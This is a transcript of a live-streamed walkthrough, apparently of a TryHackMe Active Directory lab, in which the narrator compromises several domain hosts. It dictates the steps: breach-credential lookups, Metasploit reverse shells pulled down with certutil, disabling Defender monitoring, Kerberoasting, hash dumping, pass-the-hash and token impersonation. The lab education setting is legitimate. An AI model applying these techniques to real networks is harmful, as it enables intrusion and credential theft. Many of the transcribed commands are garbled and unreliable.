I think I'm back online. I just need to edit my post because it's a new link for this transmission. I just keep on getting disconnected. I don't know why, but it's just something with the OBS Studio, I think. Anyway, anyway, it should work now. Uh, oh God, I hate doing things like live on YouTube because there are some problems with this OBS, but alright. Maybe this time it will work without problems. I was talking about the convention, the new convention for email addresses for the employees, and this is the new email server on which these email addresses shall be used, right? We know the convention, we know the server, but we don't know how to log in. And the problem here is that we can use various sites to just verify if the email address that we used it has been pwned, right? And we can just test something. There is such email address because people sometimes create dummy emails to access some services, and as you can see, it's been pwned. So yeah, just let me quickly look if everything works. Yeah, I think that right now the stream should be okay. So this is the first site, and in here, in the TryHackMe network, the team suggests to use a site that was set on the same server as this email server, and it's the site which is kind of copied from this site. This is site which allows you to check for various things, including if the account we are using has been pwned, and it's paid service. You can see pricing here, but we are not gonna use it in this case because we've got that site crafted locally, as you can see, and because I have shown that in just before I was disconnected, but this is like my house file, and as you can see, I've got this symbolic name assigned to the IP address here. That's why it's working locally, and I can search for various things. All right, so we've got this convention, right? We know the names of the employees based on the output from lead linked, I believe that's what it's called. What is this name? I think, yeah, it's lead linked, and that was the tool we used previously, and it allowed us to gather various things, including the names of the employees, and right now we are gonna use Namely, and that's another tool which allows us to use names. These are the names that I'm gonna use against these rules, being an argument here containing these variables, and we're just gonna construct various email addresses based on the rules, like using these prefixes and generally the convention used here with this smart tool here. And because I got disconnected and I have already done it, that's how you use it. It just retrieves the names from the list and adds various things, and as you can see, as a result we get the list of emails, and we can use this site provided here to check if these emails have been pawned, if there was any breach connected to this email. And as you can see in the first example, there was no breach. That's why there are no credentials publicly available for this account. But if we keep on looking, and just for sake of time I'm going to speed this process up because it's just spraying. This account has been pawned, right? We can see the password, we can see email, we can see username, and just created, just the database created for sake of this challenge. So the scenario could be that this J Stewart used this email address for a service that suffered a breach of users' credentials, and that's how the attackers, malicious actors, gathered the username, the password, and it was publicly available. And despite the I'm just checking if the stream is working. Despite the tragedy for people who suffer from these breaches, we are quite lucky to gather this information, because having information about where to log in and the credentials, we can try just authenticate and read some emails. So why won't we copy and paste these credentials and check if they work? Yes, they do. And we can see an email from Bojack Horseman which says who says that for now we can use guest account to log in on TBSec probably, right? So what is TBSec? Let's check. Here we've got our hold on, I got to check my notes really quick. Because here we are on corp ADT 01, right? And this email says that we can authenticate as TBSec guest. And again, if that was like black box approach, we would have to gather various information regarding host names and IP addresses, because we just don't know where that, and if that's really TBSec hostname is, right? So here, as we can see, we have, oh, I know, because that's RDP to the domain controller. on corporate.local, and as you can see, we are able to retrieve information about I'm just wondering, because there is command we've already used, like this PowerShell commands that allow you to gather information about Active Directory, and that's what I'm going to use right now again, because that's quite useful here. PowerShell, and we are just gonna again import this module and gather information about about domain controllers. I think it's here. Yeah, this command was included in my notes. This is DC01. We are on this domain controller, ipconfig. Yep. But what we could do is we could use just quickly ping sweeper. It's just a script or a set of commands that allow you to sweep the network using ping utility and gather information about hosts that are up on this network. So it will send ping requests to every IP address in here, because these are the variables here, and as you can see, we set this ending from 1 to 255, and it will just scan the whole network looking for hosts that are up. It's quite useful script. You can find such script on Sun's site, I think. And yeah, as you can see, 79. We've got this very useful if we've got white box approach and we get information about the domain. We can see that it's actually correct information that this house is up, and we've got our domain controller, our other DC from the Throwback Network. We've got even the firewall from previous domain, which is really cool. And for now, we could just, this is the ADT01. We can use ARPA and see. It's not communicating with the other DC. Because I'm trying to show you how to find the other domain controller, but well, it's not that super easy. And as you can see, there are many IP addresses here that are up, but theoretically we've got that DC in here, so we could try NS lookup against this address. NS lookup, and I think it won't work in here because it's just I misspelled that. NS lookup. It's just quite simple domain, and they don't have like DNS stuff. I mean they do have, right? But it's not that super easy to normally in real life scenarios it wouldn't be easy too, but I just don't want to just spend hours looking for the command to use to enumerate. Okay, I'll try because I really want to show that. uh, PowerShell IP address to host name active directory. Sorry, I need to take a sip of water because I'm talking a lot right now. I usually barely talk, to be honest, because I just work and write something and, you know, hack, but not illegally, right? But I do various challenges and do just, you know, security assessments and don't talk too much. How do I find IP address in Active Directory? Not okay. It's just great idea to use one of Microsoft. One more thing. It's working, cool. It's just great idea to use Active Directory. Sorry, Microsoft. Pages. Oh, I think I was here. Do we have this Active Directory module? Yeah, we do. Cool. So I'm going to try get AD computer. I'm going to try this command. What is going on? Get AD computer. It's not that super complicated that I cannot type this. And get it is. Get AD computer filter. Alright. I'm just going to blindly assume that I'm allowed to use. Of course not. God damn it. I just hate this, you know, DNS stuff, but it's really useful. It's just good to know these things. Reddit, another great useful information repo. Okay, that looks like, you know, a batch file. Your string IP address, set echo RAM getting the values. Oh, you know what, it's really complicated stuff. I mean, not that complicated, but I don't want to go through everything and, you know, then troubleshoot what's not working and other things. Okay, never mind. What we can do is to create another pivot point, and you know, I'm just going to do this. Likely that's not gonna work because auto route just keeps on failing and it's really frustrating, but I'm gonna try it anyway. I think I've got this command in here, but I don't. I've got it in my notes probably. No? Great. Because yeah, you have to assign a new session to this subnet in order to use in order to, you know, to just access the server. Like Or you know what, I'm going to change. No, it's not gonna work for sure. We can try this. Proxy change CME CME 10 215 79 with username of tbsec guest and password welcome. Alright, whatever, I'll copy that anyway. Because it has it contains the exclamation mark at the end, it requires to put that in quotes, like the single quotes, because that's interpreted as like a single argument. And yeah, we've got timeout. That's obviously predictable. We can use again multi-handler and set lhost to 10.50.13.5, set lport to, I've got this cheat sheet in here which says that's, you know, meta-interpreter executable that I'm going to put on this server, and lport 4445 and set payload to Windows meta-interpreter reverse TCP, and show options just to make sure that everything's set correctly. It is, yeah. So we're gonna run it, and right now I need to find actually I can also quit this Neo4j console as we are not going to use Bloodhound anyway. Yeah, locate eval. I just keep, you know, naming my meta-interpreter reverse shells like evaluation something, but just doesn't matter in a lab network. What was that? Eval corpdc corpdc.exe. All right, cool. So I'm going to copy this here with dot to, you know, it's just like present directory, and right now I'm gonna set a simple Python server, and here I'm going to use, first of all, I'm going to query the antivirus sc.exe query windefend, and it's running. And you know what, it's gonna be a really hard time if we try to put this executable file, which is technically malware, onto this DC, because antivirus would catch this executable. So I think I don't have this command, and I'm gonna miss it pretty much. Alright, I don't have it. But there is command, like, you know, a simple, oh yeah, I got it, cool. It's a command in PowerShell which allows you to just get rid of this Windows Defender. You can stop it, like the real-time protection, real-time monitoring. And we are gonna disable it, and we don't have permissions because we need that's not the box, because that's another box. You know, you need to make really good notes when doing an assessment, because during an assessment you're gonna find yourself having lots of opened tabs and everything. Alright, never mind. PowerShell really quick, and execution policy bypass in order to, you know, execute some more advanced stuff, which is by default disabled to it is disabled by default. And right now we can sc query win_defend. No, we need to use exe because it would fail. Win_defend, and we need query. Query, and right now, oh, it's running. It's still running. Ah, okay, because this is only real-time monitoring, right? So it's still running, but it's not gonna be a problem for us. So here I'm going to change the directory, downloads. As we can see, there is nothing there, and I'm just going to transfer this with wget, and I don't remember the syntax. Alright, never mind. I'm going to use certutil. Certutil -url cache -f http 10.15.13.5, and the name is evil corp dc.exe and evil.exe. Cool. It wasn't cached by the AV, so we can execute it, evil.exe, and you can see here that, yeah, we've got a new session opened. So here I'm going to background, use autoroute, set session to, as you can see, free, set cmd to auto add, run, did not find any new subnets done, set cmd to print, run, session 2. That's what I feared, basically. Sometimes, you know, it just hangs. I don't believe I'm doing something wrong, but maybe I am. But I've been talking with some people that told me that they had the same problem on this network. So I'm not going to, you know, fight with that. I'm just going to do this within these boxes. That's, you know, one way to bypass having troubles with pivoting. I usually don't like, you know, creating these zombie servers which just serve me, but sometimes that's the only option. Yeah, great. Sorry, yeah, I'm back. Okay, and we've got this this DC. So the thing we could try is to SSH as, again, tbsec guest. You know what? I think that it should be even quicker. SSH tbsec, okay, tbsec guest at 10.200. It was 15.79. Really useful cheat sheet here, right? It's rather white box approach. Where it was, we need to refresh this because sometimes it hangs and then I lose connection. So here, yeah, I'm going to use this command. Connection refused. Crap. What if we used RDP? No. I think I'm missing something. But whatever. RDP. And it's 10, 200, 215.79. And we are, no, not this time. Username. Username is tbsegguest. And the password was oh god damn it, this one. Let me see. Yep, we are gonna hopefully connect successfully. Yes, we don't care. It can take some time to use RDP. And in this case, we don't care about logging someone out, right? But in real life scenarios, we would actually. Alright, so that's another RDP inside an RDP inside RDP. Cool. And let's just take a quick look. CMD. Come on, CMD. Who am I? tbsegguest, and hostname is obviously tbsegdc01. Cool. What should we do in here? We can use that user, and as you can see, we've got administrator, we've got our current account, we've got Kerberos TGT, which is Kerberos account created by default, server account, which basically compromising this account allows us to take control over ticket creation, which can lead to silver ticket and golden ticket attacks, as well as skeleton tickets, right? This is TB service, which is interesting, and this security A, I don't know what it is. So, so here, I just skipped using Metasploit to impersonate token on corp ADT01, but I'll do that later, okay? Right now I want to show how this TB service, it can be Kerberos right? So that's what I'm going to try now. CD downloads, dir, and query windafan, because it's running, and our reverse shell would be cached. But we can use something called we can use Empire, and that's great tool. cd Empire. As you can see, I've got it installed, and here I've got commands to just prepare my Star Killer, which is great tool, really. You should install it. I'm looking to gather commands, but I think I've got those in my notes. Yeah. So first of all, I'm going to set up Empire, and as you can see, it has been set successfully, and now I'm going to use Star Killer, obviously, and this is the command. Why? Because Star Killer allows you to quite comfortably use listener and perform various actions without touching the machine here, because as you can see, the Windows Defender is running, and we're just gonna again perform some actions that would be picked up by the Windows Defender. Okay, first of all, I'm going to create a listener, HTTP listener, and it's a different IP address. My IP address is now 13.5. You can, just leave this for and submit. And right now we should have this listed here. And now we can get rid of this one and create another one. It's Windows launcher, and it's gonna use HTTP, and hopefully we can use that. And I'm going to put it in where is that? TryHackMe, Throwback 2, and this is 01 because here I've got the server, the HTTP Python server running. Okay, cool. So now what I'm going to do is here there should be an agent available as soon as we launch this batch file. So the batch file is probably here. We can take a look, lsla, and as you can see, it's here. And again, I'm going to set up Python server and use cert-util to get this file. URL cache f http that crap 10.50.13.5, and it's called launcher.bat. If I typed that correctly, of course, cert-util. And probably it got caught by the defender. No. not at all. I mistyped that name. Launcher, not launch. Launcher. And we got it. Great. Truly great. Now we can launch it. And again, I've got some problem with my typing, apparently. There we go, it hangs. And it got, you know, just crashed because it's standard, but as we can see, it's here. Cool. So we can use reviews to gather, to just attempt Kerberos thing, and it can be done with did I write down this command? Of course not, but I don't know if I need to find this Rubius Kerberos thing command. Hopefully, let's find Kerberos thing. Oh god, I've got it here, but I don't want to show everyone my notes. I'm going to have really difficult time right now, but I think that this command is somewhere here. Oh, I'm not allowed to show the content. Oh god. I just, you know, blocked myself right now. It's really frustrating because I don't have like all the commands memorized. I need to find this command, like Rubius Kerberos thing star killer. Come on, okay. I'm going to use another cheat sheet. Reviews, root. Oh, it's Kerberos thing. Domain name, domain user password, output file. Okay, it doesn't seem too complicated. So the only thing we need to change are these arguments. We can try to domain name is corporate or throwback. At this point I'm just going to, you know, check it. Domain user tbsec guest, and domain user password was this one. And output file, we can call it ticket dot txt, and what I need also is hashcat format, but it can be found here, I believe. No? Format should be here. Yeah. Format dash format hashcat. That should be correct. Dash format hashcat, and we can use this. We can use this in here. So submit function in invoke reviews. Yeah, of course. Command. We need the reviews optional fields. This one. You know what? I'll try the no. Let's leave it like this. Something will not work. It worked? No, it didn't. How to solve that? All right, never mind. What command did I use? Kerberos, really? Is it reviews and command Kerberos? Yep. We get the hash. So basically, not a hash, but a ticket, of course. So basically, this service was Kerberosable. So we could request a ticket as this guest account, and it's this ticket that we got. And the additional thing I want to add is reviews, and optional fields would be Kerberos, and format hashcat. I think that's the correct command. I'm not sure, but I'm just going to blindly assume it's correct. No. Kerberos out file. Alright, because I used out file previously. I did not want to but now it will be much more, it will be just easier to find it. See the downloads, and we can see it's here. It should be here, yeah. Type rows.hash, and we get this hash. Cool. And hashcat, it's this one, and we get this. Alright, cool. So again, I'm not going to perform hashcat cracking in here, but it's this command which resulted in gathering this password for the service account. So right now, what I could do is use run as command as user tb service, and the thing we want to run is cmd, and it asks for password, which is this one. It doesn't work. Cool. It works, but it doesn't get displayed, obviously. Attempting to start, and it started as this user. So we've got like in here okay, no cheating. These are my notes from previous hacking. So net user tb service, and as you can see, we are in local administrators, and we could also attempt gathering hashes and other stuff, but we can do this in here. Like, we can go to agents and delete this one. Yes, we want to get rid of that, and we could go to cd to users and tb something and downloads, and use again the launcher. We don't have permissions, I think. Yeah, access is denied. Okay, never mind. I'm going to just, download it again. TV service. No, there is no such. What do we have here? CD administrator. No, we do have TB service, and access is denied, but we can perform gathering hashes anyway. So we can try to go to TB service and downloads, and right now we can use serd-util-url cache-f http and 10.50.13.5 and launcher.bat again, my typing is just long. Yeah, my typing is just unacceptable, and we are gonna use this launcher. Yeah, it's now we are now if we execute command mi, we can see that right now we are at this service account. Come on. Is it still active? Yeah, a few seconds ago. It keeps on loading. I hope we did not get... No, we have connection. Alright. Because I fear that I got disconnected again. dir. Yeah, we are TB service. So now we can use Mimikatz. Let's say dump. It does require optional fields, I think. It needs to be run in elevated. But we can use the no, this is sync. Yeah, because we can perform that. Yeah, we still don't have permissions. But why? Oh yeah, I used proxy chains to perform this sync. Sometimes it just does not work locally because in this case we are not able to retrieve hashes and perform this sync attack. So the only option would be to create another pivot in here and just, I could do this. Sessions set session free, set auto, set cmd auto and run. Oh god. Set cmd delete, run, set session free, set cmd auto add. I need that, please. Set cmd auto add. Set cmd auto add. And right now run. Show options. Session free. Really? Set cmd to print and run. Session 2. God damn it. What is going on with this module? It's really frustrating because I just spent an hour trying to, find a way, but it did not work. No matter how hard I tried. Oh crap. Set session free. Let's try again. Set cmd auto add. Run. Please. No. Set cmd to print and run. No. Set session free. Run. I just I just hate it, course we are not able to perform this sync. It's just obvious, right? Because it's bullshit that we have the same subnet. Throwback to, let's do this here. What? What just happened now? Oh my god. No, it's not this one. It's security admin. That's the correct one. No, it will not work. Timeout. Yeah. Connection refused. Timeout. But what if we put the password in here? It still asks for a password, meaning we are not able to connect. Oh god. Or there is something wrong with this proxy chains nmap-st-445 and -pm on 10 to 100 15.79. Yep. Yeah, the socks does not work for version 3. Come on, set CMD to auto app, run. I'm just not able to change the session. And that's really frustrating. But I will try just uploading this malicious shell here. But I need to do this in the context of this service account. CMD. Oh, I've got another idea. But that's quite stupid. No. Run as user dbsec. No, it's db service cmd.exe and security center. I was just lucky before because the command it just ran smoothly. I hate troubleshooting. I believe everyone hates that. Come on. Service. I need service. CD downloads. There. Okay. Use multi-handler. Set lhost to 10.50.30.5. Set output to, let's say, 7997. And set payload to Windows. Meterpreter. Reverse TCP. Okay, and run. Now I'm going to prepare another reverse shell, so msf venom dash p come on dash p windows meterpreter reverse TCP, and L port will be 7997, L host will be 10.50.13.5, and file will be exe, and the output file will be file.exe. Let's be creative. I'm really creative right now. It's really late here and I feel like fighting with autoroute here. Okay, lsla and python 3 dash http.server on port 80. Okay, and here who am I, because I don't remember, of course, and cert util dash url cache dash f http 10.50.13.5, and that's just file.exe. Great. Let's launch it. Oh, by the way, the antivirus did not catch it because I did not turn it off, right? No, it's running. And I didn't use the PowerShell command here. So yeah, we've got shell. But what if I used like no, it will not work, and it's, you know, no I'm not gonna try it. Background, god damn it. Background, use autoroute, set session 4, set cmd auto add, run. Please, no, it will not be that kind to set cmd to print and run to great sessions. You know what, sessions 4, and I'm going to use hashdown. I'm going to try it. Hashdown. Yeah, it failed, of course, but we'll try to get system. No. How it was? I'm not using that command because it can crash the server. Metasploit get system, I think it was. Yeah, it's just get system. Operation failed. Okay, shell. We need who am I brief, because if we have, no, we don't have enough privileges to impersonate, because if we had other from these, like say impersonate privilege, we could just, you know, use token impersonation, but in this case we are not able to do this. And I keep wondering how to bypass this problem, because that's the intended way, right? To gain access as the service account, and then to be able to just dump the database. But as you can see, I'm fighting with this auto route and without any success. Okay, we go back to interpreter and well, 255, 255, 255. No, it's not this one. I think it's 10.200.15.0. No, it needs a subnet mask. So 255, 5 with 255.0. Invalid? What is going on? Metasploit. Metasploit pivoting. Okay. Let's try this one. Run auto route dash s and then the cider notation of this network. So I need to look once again. Run auto route. Okay. Run auto route dash s 10.200.15.0/24 because that's subnet mask of class C. And could not add route. Huh. What? Really? And what are the active routes? Of course, session 2. Great, just great. Not being able to change the session. Let's try again. And again. It's gonna crash. Huh. What should I do? It's not a Linux box. That's why creating like throws. I think that's because we got disconnected. Background jobs. I don't know what's the problem here, but apparently we got disconnected. And in here, dir. It works. Great. We'll try this one again. It requires the user, so the user is tb service. Let's see. Oh. Session 2 closed. Died. Cool. Just great. Because that means that we lost connection also here. No, we did not. And error. Yeah, it got error because we lost the connection. Because if I type dir in here, no, it still works, but it's not able to retrieve this. I got to check why. This is sync star killer. Cannot perform this sync. Oh, god damn it. Just too many problems. VAR. But, I've got another sneaky idea. Sessions. Set session 4. Set cmd auto run. If that works, I'm just very lucky. Yeah. Game over. That should happen in a moment. Let's try again. It asks for password, which is normal, but I don't believe it. It says okay. Stop starting. You know what? I think I just deleted my problem because the session died and something strange happened because well, as you can see, it's working. It's working, and I can't believe it because losing this session meant that our socks here stopped working, but somehow I don't know, I just don't know. For me, this auto route stuff is dark magic, because every time you want it, or no, most times if you want to just smoothly run everything, it would not work. But now session died and I was able to just change the session to 4. Great, cool. I mean, the task completed successfully. We obtain the hash of the administrator, and that's game over. Why? Because right now what we can do is proxy chains, if I type that correctly, and I'm going to use evilwinrm and -i to specify house, and it's 10.200.15.5. No, what I'm okay. -user administrator and hash, which is I think that evilwinrm requires only an TLM hash. And is it game over, or shall I do something else? Error key stopping. I think that's an error because something stopped working, right? Set cmd to print run session 4. Authorization error. But there is another, like another way, let's say, because we could use psexec with throwback administrator at 10.200.15.79 and with hashes flag. And we need to put proxy chains before. Not enough files. What? Oh god. I need to check if that is working. Proxy chains nmap-sd-vn-port. Let's say port 445 because it's usually open. And 10.200.15.79. Proxy chance. I don't know what am I typing today. Open. Cool. So we could also try to crack this hash, and you know what? I'm going to check for port 5985. Oh, again. Open. What is going on? I'm going to try to authenticate again. No. What if I try to crack this hash? I have not cracked it before. But wait a second. I need to go to my folders and hashcat. It will take just a moment. And I need to change my text file containing hashes, save it and run hashcat. Hashcat.exe dash module is 1000 and hash and rockU. Exhausted and no password found. Oh god damn it, really. I know what I did wrong. Obviously, because psexec requires you to put like full lm and tlm hash. So it's this whole line. Okay, login is invalid. I need to check the syntax. psexec command hashes. Actually, we could use this module as the hash within Metasploit. But now I want to know the classical, the manual way. psexec help, psexec.py maybe. Maybe here. Nope. I don't think so. Hashes. What is the syntax? InPacket is great toolkit, but it has confusing syntax, in my opinion. I'm just going to check it really quick because I'm currently writing a series of articles regarding exploiting Active Directory and actually domain controllers, and I have just, you know, a great cheat sheet created. So I'm using it because it's just useful. Where is that? Hashes. Main name, username. It doesn't give me much because I'm not sure about the domain syntax, and it just doesn't disclose it. No, but the syntax should be correct. So this is the command I'm going to use, and the hashes are this one, these two actually, the hash, and the main name is Throwback, and username is administrator actually, administrator, and the IP address is 10.100.15.79, and we need proxy chains. Proxy chains. You know, I'm just trying stupid things right now because there is some problem in here and I'm not seeing it right now. Yeah, login invalid. But I believe that I have an administrative access to this domain. Just 5 minutes break, please. I'm back. I just needed to grab something to eat because I skipped my supper. Okay. I've got one more idea. What we can do is to verify one more thing. Again, proxy chains. Crack map exec and smb 10.200.15.79, and this time I'm going to specify username of, where is that, TB service, and the password of TB service, because I need to check something. And the password was this one. No. Or yeah, it was this one. And it says pound, right? So what if we just used proxy chains with x3 RDP? Username is TB service, and the password is security admin something, and of course IP address 10.200 and 15.79. We got the connection. Cool. Really cool. So what do we have? We have hashes, but apparently I'm not able to use them. Okay, and I'm going to check one more thing. CMD, run as administrator. Yes. It was the whole thing. It was the whole thing, because as you can see, I am able to list everything, because this account, I forgot about that. Net user TB service. This user is in administrators group locally, and if we query net user administrator, they are in the group of administrators. We do have their hash, but we don't know if they are allowed to, you know, manage the computer remotely, because you know, various things happen when it comes to setting up servers and permissions and other stuff. So we have administrative access to the server as TB service, And we've got the hash of the administrator, which could be cracked, and because that's NTLM hash, that means if the hash is complicated, it would take like probably a couple of days or hours to just crack it using strong GPU. So basically that means it's game over for the domain, because we had administrative access to the previous domain controller as Mercer H, as far as I remember, and then we have administrative access to this box, and we have successfully compromised the. Okay, let's go through. Proxy chains x3 RDP, and the user was oh, and I forgot about that, but we should also impersonate token as this Davis J at corp AD01, and we can do this right now really quick. X3, I will just use RDP again, why not? So Davis J, and the password was management 2018, I think, yeah. And IP address 10.200.15.243. No, not at all. Oh god. I'll just use, this quick cheat sheet in here. What is going on? Do we have the connection? It's the first question. Yeah, I think so. Yeah, it's 233, but we cannot use RDP, I think, because it hangs, meaning that but do we have like proxy chains nmap dash st dash p, let's say 22 and 445, because that's Windows and that should be open, and dash pn 10.200.33, no, 15.233. What is going on? Did I miss something? -m 10.200.15.243 ping dash m. What is wrong? Yeah, of course we need to provide a count, and as you can see it's not responding, meaning that probably probably we need to go back. No, that should not be the case in here, because we've got connection right here. No, let me check that. But we should be able to ping the domain controller anyway. So I'll change that to 118. And we are not. Hostname. Okay, let's take a step back. So this one was successfully compromised, right? This one was just mail, this one was compromised, and this one was compromised. The only thing to do is this one. and I don't feel like you know going back there. But okay, let's do this anyway. Now sessions, use multi-handler, set l host to download set our port to 8008, set, I think the payload is correct. Okay, let's run it. And here evil pro.txt, and we've got another shell. So once again, let's use, how did I do this in this case? Because the session died. Okay, so use auto route background, of course. Background, use auto route and set session 6, set cmd auto add, run. Here, oh my god, show options. And as you can see, the session is set to 6, but if we set cmd to print, the session will be 4, which was really great, but not now. Run. Yeah, that's the problem. Okay, never mind. Okay. Oh god damn it. I need to access the no, I'm not able to access this because I need proxy chains again. Okay, sessions for kill. No. Let's try kill 6, kill 4. No, it's only applicable sessions 4, and we are going to exit, and it closed. So now we're gonna set cmd to print and run, and as you can see, nothing is set right now. So we're gonna set session 6 and set cmd to auto and run. Yep, and now we should be able to access the main controller once again. Yeah, we are back, and we are on this 118, which is our connection to this corp DC, which is great because the next step will be to just SSH. Where am I? What is this? IP config. No, it's not this one. It's our previous. We just gonna exit. Here SSH. What was that? Davis chain. No. What were the credentials? They can be accessed anyway, right? I did not write that down. I told you to write it down, but I didn't do this. Google. GitHub and Throwback hacks. Oh, too many things to do. Net user domain. Does it work? No. Because I'm on. Where am I? ipconfig. I don't remember. It's still. Let's minimize that. Where am I now? ipconfig. Okay, that's the correct host. And now net user domain. What is wrong with this? What is going on? I'm just tired, you know. Okay, never mind. Throwback hacks. Yeah. No. Rika Fox, right? Rika Fox. Yeah. Here and here and here. That was the first one. Redacted. Oh. Of course. Davis J. Yeah, I was correct. SSH Davis J at 10.200.15.233. Does it work? Please work. No, it doesn't. I just don't remember. Oh, I know what's wrong. Because here host name, no, that's not what I was expecting. Okay, once again, let's close all these tabs. This one also. RDP. No, EDP. We are not going to do some buffer overflows. Connect and Pikachu 7. Come on. And here I'm going to prepare a listener because we need to use multi-handler to create another. Oh, where is that? File.exe 7997. That's what we are going to use. Set port to 7997 and let's show options. It should be correct. Okay, let's run it, and here we've got our server. So that's the place we are going to reach in a moment with the certificate is not trusted and we don't care, and we should have a session in a moment. Yes, we do. We have the session. CMD. Host name. No. Wait, what is going on here? Am I doing something wrong? ipconfig. I just get redirected? Doesn't make sense. CMD. Post name. Okay. SSH. No. No. I think we can do this. What is this? And I will try to SSH onto that. So mer 10.200.15.200 please. No, it will not work. I think we have done something wrong. So we'll try to connect once again, but from, I don't know, from where. Because technically we should be on that box, but we are not. We are on this box. I don't know what. And here we don't have access to this box. Actually, no, it will not work. It will not work that way. Actually, there is a chance that there is something wrong with the network right now. So I requested to reset it. But anyway, because it's getting late here, like quite late, I'm going to give up on this one, because the only part there was to perform token impersonation. So token impersonation, so nation on using Metasploit is quite easy, because you get Meterpreter shell, right? Then you load incognito. Actually, do I have a shell here? Yes, I should have sessions. And let's use this sessions free and load incognito. Load incognito. Okay, then we are able to list tokens -u, I think. list tokens, and as you can see, there are no tokens available. But if there were, actually we can use also this G, and actually we can use, for example, let's try this token, and the syntax here is just, okay, I'll use my, it's here, impersonate token. It's the screen from, because previously I used like manual method to elevate tokens, but nah, it did not work, so I used Metasploit, and it's really smooth when using Metasploit. So impersonate token, and here we need to provide the name as the authority, let's say. Okay, it wasn't found because here we don't have tokens available. So if we had, we could just, you know, impersonate token, and here we can list the tokens, and as you can see, oh, I know what I did wrong, probably. Let's use this one, okay? Successfully impersonated user throwback Mercer age. So that's the same point that we started. But here on this box we can use incognito, list tokens. We have that system token, which is the most important, and we can try to impersonate. And as soon as we impersonate successfully, we need to run ps to list all processes, because practically speaking, the process we access in here does not exist, meaning we are not able to, for example, spawn a shell. But if we migrate to some other process, we are able to have like full control over what we are doing and spawn a shell or the additional things. So yeah, I'm gonna give up on this box only because I have some really strange, I don't know what, troubles with coming back this time, because as you could see, first of all I had problems to set another session, and now I've got problems to go back. So this is pivoting in a nutshell. You're always gonna find some problem with that, and it doesn't mean that pivoting is useless and you should not try it. Pivoting is super important because usually in bigger like companies and networks, you would have this networks like there was a very nice expression for that in this course, but I cannot just, you know, remember right now. But I think it's segmented network, and I'm quite sure it was this expression, because you've got like, you know, segments, and you need to pivot from one to another and gain access, and it's very crucial to have that ability to, you know, just pivot easily. Here it's quite complicated because as you could see, it was quite the same subnet, and the auto route just, you know, went wild at some time. So my attempts were unsuccessful, then I was successful because one of the sessions died, but I did not lose the access, so strange things happen sometimes. Okay, I think that's all. We have basically compromised the whole domain. I hope that you at least only a little bit had fun watching this video, and I think that there will be some future streams or some other videos, because as you can see, I was quite stressed at the beginning, but right now I'm just, have my chill and I'm able to describe things I'm doing better. So I think I'm going to be better and better in streaming and posting some other videos. Right now I'm going to publish a set of articles regarding compromising domain controllers in CTF environments. So if you're interested, just you can follow me on Twitter, and you can just if you have some questions, feel free to text me on Twitter, or you can find me on Instagram also. And if you have additional questions or feel that something was missed by me in this video, or I did something wrong, which I probably did, but I don't care right now because it's been a couple of hours and I'm quite tired. And yeah, just have fun hacking, follow some good steps that I've taken, and see you soon, actually.